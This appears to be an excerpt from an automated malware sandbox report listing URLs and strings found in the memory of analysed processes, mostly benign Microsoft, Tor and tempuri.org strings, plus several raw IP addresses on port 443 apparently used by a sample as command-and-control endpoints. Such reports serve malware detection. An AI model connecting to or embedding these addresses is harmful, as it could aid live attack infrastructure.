Source: AppLaunch.exe, 00000005.00000002.1826314997.0000000006421000.00000004.00000800.00020000.00000000.sdmp, 7FE0.exe, 00000011.00000002.2156209250.00000000024E1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id15Response
Source: 7FE0.exe, 00000011.00000002.2156209250.000000000257A000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id15ResponseD
Source: AppLaunch.exe, 00000005.00000002.1826314997.0000000006421000.00000004.00000800.00020000.00000000.sdmp, 7FE0.exe, 00000011.00000002.2156209250.00000000024E1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id16
Source: AppLaunch.exe, 00000005.00000002.1826314997.0000000006421000.00000004.00000800.00020000.00000000.sdmp, 7FE0.exe, 00000011.00000002.2156209250.00000000024E1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id16Response
Source: AppLaunch.exe, 00000005.00000002.1826314997.00000000064BA000.00000004.00000800.00020000.00000000.sdmp, 7FE0.exe, 00000011.00000002.2156209250.000000000257A000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id16ResponseD
Source: AppLaunch.exe, 00000005.00000002.1826314997.0000000006421000.00000004.00000800.00020000.00000000.sdmp, 7FE0.exe, 00000011.00000002.2156209250.00000000024E1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id17
Source: AppLaunch.exe, 00000005.00000002.1826314997.0000000006421000.00000004.00000800.00020000.00000000.sdmp, 7FE0.exe, 00000011.00000002.2156209250.00000000024E1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id17Response
Source: AppLaunch.exe, 00000005.00000002.1826314997.0000000006886000.00000004.00000800.00020000.00000000.sdmp, 7FE0.exe, 00000011.00000002.2156209250.000000000257A000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id17ResponseD
Source: AppLaunch.exe, 00000005.00000002.1826314997.0000000006421000.00000004.00000800.00020000.00000000.sdmp, 7FE0.exe, 00000011.00000002.2156209250.00000000024E1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id18
Source: AppLaunch.exe, 00000005.00000002.1826314997.0000000006421000.00000004.00000800.00020000.00000000.sdmp, 7FE0.exe, 00000011.00000002.2156209250.00000000024E1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id18Response
Source: AppLaunch.exe, 00000005.00000002.1826314997.0000000006886000.00000004.00000800.00020000.00000000.sdmp, 7FE0.exe, 00000011.00000002.2156209250.000000000257A000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id18ResponseD
Source: AppLaunch.exe, 00000005.00000002.1826314997.0000000006421000.00000004.00000800.00020000.00000000.sdmp, 7FE0.exe, 00000011.00000002.2156209250.00000000024E1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id19
Source: AppLaunch.exe, 00000005.00000002.1826314997.0000000006421000.00000004.00000800.00020000.00000000.sdmp, 7FE0.exe, 00000011.00000002.2156209250.00000000024E1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id19Response
Source: AppLaunch.exe, 00000005.00000002.1826314997.0000000006886000.00000004.00000800.00020000.00000000.sdmp, 7FE0.exe, 00000011.00000002.2156209250.000000000257A000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id19ResponseD
Source: AppLaunch.exe, 00000005.00000002.1826314997.0000000006421000.00000004.00000800.00020000.00000000.sdmp, 7FE0.exe, 00000011.00000002.2156209250.00000000024E1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id1Response
Source: AppLaunch.exe, 00000005.00000002.1826314997.00000000064BA000.00000004.00000800.00020000.00000000.sdmp, 7FE0.exe, 00000011.00000002.2156209250.000000000257A000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id1ResponseD
Source: AppLaunch.exe, 00000005.00000002.1826314997.0000000006421000.00000004.00000800.00020000.00000000.sdmp, 7FE0.exe, 00000011.00000002.2156209250.00000000024E1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id2
Source: AppLaunch.exe, 00000005.00000002.1826314997.0000000006421000.00000004.00000800.00020000.00000000.sdmp, 7FE0.exe, 00000011.00000002.2156209250.00000000024E1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id20
Source: AppLaunch.exe, 00000005.00000002.1826314997.0000000006421000.00000004.00000800.00020000.00000000.sdmp, 7FE0.exe, 00000011.00000002.2156209250.00000000024E1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id20Response
Source: AppLaunch.exe, 00000005.00000002.1826314997.00000000064BA000.00000004.00000800.00020000.00000000.sdmp, 7FE0.exe, 00000011.00000002.2156209250.000000000257A000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id20ResponseD
Source: AppLaunch.exe, 00000005.00000002.1826314997.0000000006421000.00000004.00000800.00020000.00000000.sdmp, 7FE0.exe, 00000011.00000002.2156209250.00000000024E1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id21
Source: AppLaunch.exe, 00000005.00000002.1826314997.0000000006421000.00000004.00000800.00020000.00000000.sdmp, 7FE0.exe, 00000011.00000002.2156209250.00000000024E1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id21Response
Source: AppLaunch.exe, 00000005.00000002.1826314997.0000000006886000.00000004.00000800.00020000.00000000.sdmp, 7FE0.exe, 00000011.00000002.2156209250.000000000257A000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id21ResponseD
Source: AppLaunch.exe, 00000005.00000002.1826314997.0000000006421000.00000004.00000800.00020000.00000000.sdmp, 7FE0.exe, 00000011.00000002.2156209250.00000000024E1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id22
Source: AppLaunch.exe, 00000005.00000002.1826314997.00000000064BA000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 00000005.00000002.1826314997.0000000006421000.00000004.00000800.00020000.00000000.sdmp, 7FE0.exe, 00000011.00000002.2156209250.000000000257A000.00000004.00000800.00020000.00000000.sdmp, 7FE0.exe, 00000011.00000002.2156209250.00000000024E1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id22Response
Source: AppLaunch.exe, 00000005.00000002.1826314997.0000000006968000.00000004.00000800.00020000.00000000.sdmp, 7FE0.exe, 00000011.00000002.2156209250.00000000028A7000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id22ResponseD
Source: AppLaunch.exe, 00000005.00000002.1826314997.0000000006960000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 00000005.00000002.1826314997.0000000006421000.00000004.00000800.00020000.00000000.sdmp, 7FE0.exe, 00000011.00000002.2156209250.00000000025C7000.00000004.00000800.00020000.00000000.sdmp, 7FE0.exe, 00000011.00000002.2156209250.00000000024E1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id23
Source: AppLaunch.exe, 00000005.00000002.1826314997.00000000064BA000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 00000005.00000002.1826314997.0000000006421000.00000004.00000800.00020000.00000000.sdmp, 7FE0.exe, 00000011.00000002.2156209250.000000000257A000.00000004.00000800.00020000.00000000.sdmp, 7FE0.exe, 00000011.00000002.2156209250.00000000024E1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id23Response
Source: AppLaunch.exe, 00000005.00000002.1826314997.0000000006968000.00000004.00000800.00020000.00000000.sdmp, 7FE0.exe, 00000011.00000002.2156209250.00000000028A7000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id23ResponseD
Source: AppLaunch.exe, 00000005.00000002.1826314997.0000000006421000.00000004.00000800.00020000.00000000.sdmp, 7FE0.exe, 00000011.00000002.2156209250.00000000024E1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id24
Source: AppLaunch.exe, 00000005.00000002.1826314997.0000000006421000.00000004.00000800.00020000.00000000.sdmp, 7FE0.exe, 00000011.00000002.2156209250.00000000024E1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id24Response
Source: AppLaunch.exe, 00000005.00000002.1826314997.0000000006421000.00000004.00000800.00020000.00000000.sdmp, 7FE0.exe, 00000011.00000002.2156209250.00000000024E1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id2Response
Source: AppLaunch.exe, 00000005.00000002.1826314997.00000000064BA000.00000004.00000800.00020000.00000000.sdmp, 7FE0.exe, 00000011.00000002.2156209250.000000000257A000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id2ResponseD
Source: AppLaunch.exe, 00000005.00000002.1826314997.0000000006421000.00000004.00000800.00020000.00000000.sdmp, 7FE0.exe, 00000011.00000002.2156209250.00000000024E1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id3
Source: AppLaunch.exe, 00000005.00000002.1826314997.0000000006421000.00000004.00000800.00020000.00000000.sdmp, 7FE0.exe, 00000011.00000002.2156209250.00000000024E1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id3Response
Source: AppLaunch.exe, 00000005.00000002.1826314997.0000000006421000.00000004.00000800.00020000.00000000.sdmp, 7FE0.exe, 00000011.00000002.2156209250.00000000024E1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id4
Source: AppLaunch.exe, 00000005.00000002.1826314997.0000000006421000.00000004.00000800.00020000.00000000.sdmp, 7FE0.exe, 00000011.00000002.2156209250.00000000024E1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id4Response
Source: AppLaunch.exe, 00000005.00000002.1826314997.00000000064BA000.00000004.00000800.00020000.00000000.sdmp, 7FE0.exe, 00000011.00000002.2156209250.000000000257A000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id4ResponseD
Source: AppLaunch.exe, 00000005.00000002.1826314997.0000000006421000.00000004.00000800.00020000.00000000.sdmp, 7FE0.exe, 00000011.00000002.2156209250.00000000024E1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id5
Source: AppLaunch.exe, 00000005.00000002.1826314997.0000000006421000.00000004.00000800.00020000.00000000.sdmp, 7FE0.exe, 00000011.00000002.2156209250.00000000024E1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id5Response
Source: 7FE0.exe, 00000011.00000002.2156209250.000000000257A000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id5ResponseD
Source: AppLaunch.exe, 00000005.00000002.1826314997.0000000006421000.00000004.00000800.00020000.00000000.sdmp, 7FE0.exe, 00000011.00000002.2156209250.00000000024E1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id6
Source: AppLaunch.exe, 00000005.00000002.1826314997.0000000006421000.00000004.00000800.00020000.00000000.sdmp, 7FE0.exe, 00000011.00000002.2156209250.00000000024E1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id6Response
Source: AppLaunch.exe, 00000005.00000002.1826314997.00000000068DB000.00000004.00000800.00020000.00000000.sdmp, 7FE0.exe, 00000011.00000002.2156209250.000000000257A000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id6ResponseD
Source: AppLaunch.exe, 00000005.00000002.1826314997.0000000006421000.00000004.00000800.00020000.00000000.sdmp, 7FE0.exe, 00000011.00000002.2156209250.00000000024E1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id7
Source: AppLaunch.exe, 00000005.00000002.1826314997.0000000006421000.00000004.00000800.00020000.00000000.sdmp, 7FE0.exe, 00000011.00000002.2156209250.00000000024E1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id7Response
Source: AppLaunch.exe, 00000005.00000002.1826314997.00000000064BA000.00000004.00000800.00020000.00000000.sdmp, 7FE0.exe, 00000011.00000002.2156209250.000000000257A000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id7ResponseD
Source: AppLaunch.exe, 00000005.00000002.1826314997.0000000006421000.00000004.00000800.00020000.00000000.sdmp, 7FE0.exe, 00000011.00000002.2156209250.00000000024E1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id8
Source: AppLaunch.exe, 00000005.00000002.1826314997.0000000006421000.00000004.00000800.00020000.00000000.sdmp, 7FE0.exe, 00000011.00000002.2156209250.00000000024E1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id8Response
Source: AppLaunch.exe, 00000005.00000002.1826314997.00000000064BA000.00000004.00000800.00020000.00000000.sdmp, 7FE0.exe, 00000011.00000002.2156209250.000000000257A000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id8ResponseD
Source: AppLaunch.exe, 00000005.00000002.1826314997.0000000006421000.00000004.00000800.00020000.00000000.sdmp, 7FE0.exe, 00000011.00000002.2156209250.00000000024E1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id9
Source: AppLaunch.exe, 00000005.00000002.1826314997.00000000064BA000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 00000005.00000002.1826314997.0000000006421000.00000004.00000800.00020000.00000000.sdmp, 7FE0.exe, 00000011.00000002.2156209250.00000000024E1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id9Response
Source: AppLaunch.exe, 00000005.00000002.1826314997.0000000006968000.00000004.00000800.00020000.00000000.sdmp, 7FE0.exe, 00000011.00000002.2156209250.00000000025D0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id9ResponseD
Source: explorer.exe, 0000000B.00000000.1733312521.000000000C964000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.autoitscript.com/autoit3/J
Source: Tg9kb35.exe, 00000002.00000003.1655339902.00000000006EC000.00000004.00000020.00020000.00000000.sdmp, Tg9kb35.exe, 00000002.00000003.1655167777.000000000489C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.digicert.com/CPS0
Source: 9AED.exe, 00000018.00000002.2633753789.00000000027AE000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.w3.o
Source: AppLaunch.exe, 00000009.00000002.2013665902.0000000000400000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: http://www.winimage.com/zLibDll
Source: 8F82.exe, 00000013.00000002.2006862081.0000019433F41000.00000004.00000800.00020000.00000000.sdmp, 8F82.exe, 0000001C.00000002.2066577791.00000135CB661000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://164.90.185.9:443
Source: 8F82.exe, 00000013.00000002.2006862081.0000019433F41000.00000004.00000800.00020000.00000000.sdmp, 8F82.exe, 0000001C.00000002.2066577791.00000135CB661000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://18.179.137.198:443
Source: 8F82.exe, 00000013.00000002.2006862081.0000019433F41000.00000004.00000800.00020000.00000000.sdmp, 8F82.exe, 0000001C.00000002.2066577791.00000135CB661000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://185.217.98.121:443
Source: 8F82.exe, 00000013.00000002.2006862081.0000019433F41000.00000004.00000800.00020000.00000000.sdmp, 8F82.exe, 0000001C.00000002.2066577791.00000135CB661000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://192.99.196.191:443
Source: tor-real.exe, 0000001D.00000000.2123708088.0000000000F76000.00000002.00000001.01000000.00000015.sdmp	String found in binary or memory: https://2019.www.torproject.org/docs/faq.html.en#WarningsAboutSOCKSandDNSInformationLeaks.%s
Source: tor-real.exe, 0000001D.00000000.2123708088.0000000000F76000.00000002.00000001.01000000.00000015.sdmp	String found in binary or memory: https://2019.www.torproject.org/docs/faq.html.en#WarningsAboutSOCKSandDNSInformationLeaks.%sDANGEROU
Source: 8F82.exe, 00000013.00000002.2006862081.0000019433F41000.00000004.00000800.00020000.00000000.sdmp, 8F82.exe, 0000001C.00000002.2066577791.00000135CB661000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://44.228.161.50:443
Source: 8F82.exe, 00000013.00000002.2006862081.0000019433F41000.00000004.00000800.00020000.00000000.sdmp, 8F82.exe, 0000001C.00000002.2066577791.00000135CB661000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://64.227.21.98:443
Source: AppLaunch.exe, 00000005.00000002.1830858383.00000000081DB000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 00000005.00000002.1830858383.00000000080A5000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 00000005.00000002.1830858383.0000000008132000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 00000005.00000002.1830858383.0000000008018000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 00000005.00000002.1826314997.00000000069A7000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 00000005.00000002.1830858383.0000000008034000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 00000005.00000002.1826314997.00000000069DF000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 00000005.00000002.1826314997.0000000006AD3000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 00000005.00000002.1826314997.0000000006A75000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 00000005.00000002.1830858383.0000000007FA6000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 00000005.00000002.1826314997.0000000006A3D000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 00000005.00000002.1830858383.000000000824C000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 00000005.00000002.1830858383.00000000081BF000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 00000005.00000002.1830858383.0000000007F8B000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 00000005.00000002.1830858383.000000000814E000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 00000005.00000002.1830858383.00000000080C1000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 00000005.00000002.1830858383.0000000008268000.00000004.00000800.00020000.00000000.sdmp, 7FE0.exe, 00000011.00000002.2156209250.00000000029C7000.00000004.00000800.00020000.00000000.sdmp, 7FE0.exe, 00000011.00000002.2156209250.00000000028FD000.00000004.00000800.00020000.00000000.sdmp, 7FE0.exe, 00000011.00000002.2156209250.0000000002969000.00000004.00000800.00020000.00000000.sdmp, 9AED.exe, 00000018.00000003.2560173451.0000000004161000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://ac.ecosia.org/autocomplete?q=
Source: explorer.exe, 0000000B.00000000.1733312521.000000000C893000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://activity.windows.com/UserActivity.ReadWrite.CreatedByAppcrobat.exe
Source: explorer.exe, 0000000B.00000000.1721922206.00000000079FB000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://aka.ms/Vh5j3k
Source: explorer.exe, 0000000B.00000000.1721922206.00000000079FB000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://aka.ms/odirmr
Source: explorer.exe, 0000000B.00000000.1733312521.000000000C5AA000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://android.notify.windows.com/iOS
Source: AppLaunch.exe, 00000005.00000002.1826314997.0000000006421000.00000004.00000800.00020000.00000000.sdmp, 7FE0.exe, 00000011.00000002.2156209250.00000000024E1000.00000004.00000800.00020000.00000000.sdmp, 9AED.exe, 00000018.00000002.2633753789.0000000002531000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://api.ip.sb/ip
Source: explorer.exe, 0000000B.00000000.1724220007.00000000097D4000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://api.msn.com/
Source: explorer.exe, 0000000B.00000000.1724220007.00000000097D4000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://api.msn.com/q
Source: explorer.exe, 0000000B.00000000.1721188907.0000000003700000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000B.00000000.1720193511.0000000001248000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://api.msn.com/v1/News/Feed/Windows?apikey=qrUeHGGYvVowZJuHA3XaH0uUvg1ZJ0GUZnXk3mxxPF&ocid=wind
Source: explorer.exe, 0000000B.00000000.1724220007.00000000096DF000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://api.msn.com/v1/news/Feed/Windows?&
Source: explorer.exe, 0000000B.00000000.1721922206.0000000007900000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://api.msn.com/v1/news/Feed/Windows?activityId=0CC40BF291614022B7DF6E2143E8A6AF&timeOut=5000&oc
Source: explorer.exe, 0000000B.00000000.1721922206.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000B.00000000.1724220007.00000000097D4000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://api.msn.com:443/v1/news/Feed/Windows?
Source: explorer.exe, 0000000B.00000000.1724220007.00000000096DF000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://arc.msn.comi
Source: explorer.exe, 0000000B.00000000.1721922206.0000000007900000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://assets.msn.com/staticsb/statics/latest/traffic/Notification/desktop/svg/RoadHazard.svg
Source: explorer.exe, 0000000B.00000000.1721922206.0000000007900000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://assets.msn.com/weathermapdata/1/static/finance/1stparty/FinanceTaskbarIcons/Finance_Earnings
Source: explorer.exe, 0000000B.00000000.1721922206.0000000007900000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://assets.msn.com/weathermapdata/1/static/weather/Icons/JyNGQgA=/Condition/AAehR3S.svg
Source: explorer.exe, 0000000B.00000000.1721922206.0000000007900000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://assets.msn.com/weathermapdata/1/static/weather/Icons/JyNGQgA=/Teaser/humidity.svg
Source: tor-real.exe, 0000001D.00000000.2123708088.0000000000F76000.00000002.00000001.01000000.00000015.sdmp	String found in binary or memory: https://blog.torproject.org/blog/lifecycle-of-a-new-relay
Source: tor-real.exe, 0000001D.00000000.2123708088.0000000000F76000.00000002.00000001.01000000.00000015.sdmp	String found in binary or memory: https://blog.torproject.org/blog/lifecycle-of-a-new-relayCan
Source: tor-real.exe, 0000001D.00000000.2123708088.0000000000F76000.00000002.00000001.01000000.00000015.sdmp	String found in binary or memory: https://blog.torproject.org/v2-deprecation-timeline
Source: tor-real.exe, 0000001D.00000000.2123708088.0000000000F76000.00000002.00000001.01000000.00000015.sdmp	String found in binary or memory: https://blog.torproject.org/v2-deprecation-timelineCalled
Source: tor-real.exe, 0000001D.00000000.2123708088.0000000000F76000.00000002.00000001.01000000.00000015.sdmp	String found in binary or memory: https://bugs.torproject.org/tpo/core/tor/14917.
Source: tor-real.exe, 0000001D.00000000.2123708088.0000000000F76000.00000002.00000001.01000000.00000015.sdmp	String found in binary or memory: https://bugs.torproject.org/tpo/core/tor/21155.
Source: tor-real.exe, 0000001D.00000000.2123708088.0000000000F76000.00000002.00000001.01000000.00000015.sdmp	String found in binary or memory: https://bugs.torproject.org/tpo/core/tor/8742.
Source: AppLaunch.exe, 00000005.00000002.1830858383.00000000081DB000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 00000005.00000002.1830858383.00000000080A5000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 00000005.00000002.1830858383.0000000008132000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 00000005.00000002.1830858383.0000000008018000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 00000005.00000002.1826314997.00000000069A7000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 00000005.00000002.1830858383.0000000008034000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 00000005.00000002.1826314997.00000000069DF000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 00000005.00000002.1826314997.0000000006AD3000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 00000005.00000002.1826314997.0000000006A75000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 00000005.00000002.1830858383.0000000007FA6000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 00000005.00000002.1826314997.0000000006A3D000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 00000005.00000002.1830858383.000000000824C000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 00000005.00000002.1830858383.00000000081BF000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 00000005.00000002.1830858383.0000000007F8B000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 00000005.00000002.1830858383.000000000814E000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 00000005.00000002.1830858383.00000000080C1000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 00000005.00000002.1830858383.0000000008268000.00000004.00000800.00020000.00000000.sdmp, 7FE0.exe, 00000011.00000002.2156209250.00000000029C7000.00000004.00000800.00020000.00000000.sdmp, 7FE0.exe, 00000011.00000002.2156209250.00000000028FD000.00000004.00000800.00020000.00000000.sdmp, 7FE0.exe, 00000011.00000002.2156209250.0000000002969000.00000004.00000800.00020000.00000000.sdmp, 9AED.exe, 00000018.00000003.2560173451.0000000004161000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
Source: explorer.exe, 0000000B.00000000.1721922206.0000000007900000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13f2DV
Source: explorer.exe, 0000000B.00000000.1721922206.0000000007900000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13f2DV-dark
Source: explorer.exe, 0000000B.00000000.1721922206.00000000078AD000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gHZu
Source: explorer.exe, 0000000B.00000000.1721922206.00000000078AD000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gHZu-dark
Source: explorer.exe, 0000000B.00000000.1721922206.0000000007900000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gMeu
Source: explorer.exe, 0000000B.00000000.1721922206.0000000007900000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gMeu-dark
Source: explorer.exe, 0000000B.00000000.1721922206.0000000007900000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gTUY
Source: explorer.exe, 0000000B.00000000.1721922206.0000000007900000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gTUY-dark
Source: AppLaunch.exe, 00000005.00000002.1830858383.00000000081DB000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 00000005.00000002.1830858383.00000000080A5000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 00000005.00000002.1830858383.0000000008132000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 00000005.00000002.1830858383.0000000008018000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 00000005.00000002.1826314997.00000000069A7000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 00000005.00000002.1830858383.0000000008034000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 00000005.00000002.1826314997.00000000069DF000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 00000005.00000002.1826314997.0000000006AD3000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 00000005.00000002.1826314997.0000000006A75000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 00000005.00000002.1830858383.0000000007FA6000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 00000005.00000002.1826314997.0000000006A3D000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 00000005.00000002.1830858383.000000000824C000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 00000005.00000002.1830858383.00000000081BF000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 00000005.00000002.1830858383.0000000007F8B000.00000004.00000800.00020000.00000000.sdmp, 